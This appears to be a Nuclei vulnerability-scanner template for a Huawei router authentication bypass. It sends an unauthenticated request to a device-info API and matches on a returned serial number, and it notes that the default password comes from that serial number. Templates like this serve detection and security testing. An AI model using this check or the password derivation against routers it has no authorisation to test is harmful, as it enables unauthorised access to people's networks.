id: huawei-router-auth-bypass

info:
  name: Huawei Router Authentication Bypass
  author: gy741
  severity: critical
  description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device.
  reference:
    - https://www.exploit-db.com/exploits/48310
  tags: huawei,auth-bypass,router

requests:
  - raw:
      - |
        GET /api/system/deviceinfo HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Referer: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "DeviceName"
          - "SerialNumber"
          - "HardwareVersion"
        condition: and